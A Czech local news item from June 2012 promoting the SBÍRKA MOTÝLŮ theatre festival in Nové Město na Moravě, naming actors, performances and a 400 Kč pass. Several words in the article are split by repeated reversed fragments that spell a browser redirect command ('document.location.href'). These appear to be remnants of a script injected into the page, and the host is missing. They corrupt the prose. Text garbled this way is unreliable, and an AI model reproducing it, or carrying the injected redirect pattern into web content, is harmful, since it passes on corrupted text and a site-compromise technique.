Nové Město na Moravě, nove mesto na morave, aktuality, divadlo
Rainbow page separator

Hvězdy divadelního světa v Novém Městě na Moravě

Pondělí, 4. června 2012

sbirka-motylu-2012-trojanNové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě /Přijeďte do Nového Města na Moravě za hvězdami divadelního světa!Festival SBÍRKA MOTÝLŮ 2012 – BOŽSKÁ KOMÉDYJE, který se koná ve dnech 7. – 9. června,láká svoje příznivce na koktejl divadla, hudby a výtvarna. Do programu jsou zařazena představení pro diváky všech kategorií, tmelem dramaturgie je kvalita a neotřelost.

Ve čtvrtek sólově vys[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toupí patron festivalu, divadelní a filmový herec Petr Vaněk. V pátek se představí ve hře Misantrop brněnského Buranteatru čerstvý držitel Ceny Alfreda Radoka,Michal Isteník. Páteční večer bude patřit barevnému průvodu v centru města a koncertu mládeží oblíbené kapely Zrní, vyvrcholí fireshow a ohňostrojem. Z nabité sobotní nabídky vyberme poetické představení hradeckého DRAKu Děvčátko se sirkami a exkluzivní vys[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toupení jednoho z nejuznávanějších českých souborů, Dejvického divadla, se svým kusem Dealer’s Choice (Kdo rozdává, rozhodne). Divákům se představí například Ivan Trojan nebo Václav Neužil, držitel le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošní Thalie. Záštitu převzala předsedkyně Poslanecké sněmovny Parlamentu ČR, Miroslava Němcová.

Projekt se těší podpoře Nového Města na Moravě a Volksbank CZ. Permanentka za 400 Kč je k dostání v novoměstském Informačním centru, na každý bod programu lze na místě zakoupit samostatnou vstupenku. Více se o 6. ročníku festivalu pořádaném o.s.

Lysina lenina ve spolupráci s Novoměstskými kulturními zařízeními a ZUŠ Jana Štursy dozvíte na

http://sbirkamotylu.lysinalenina.cz/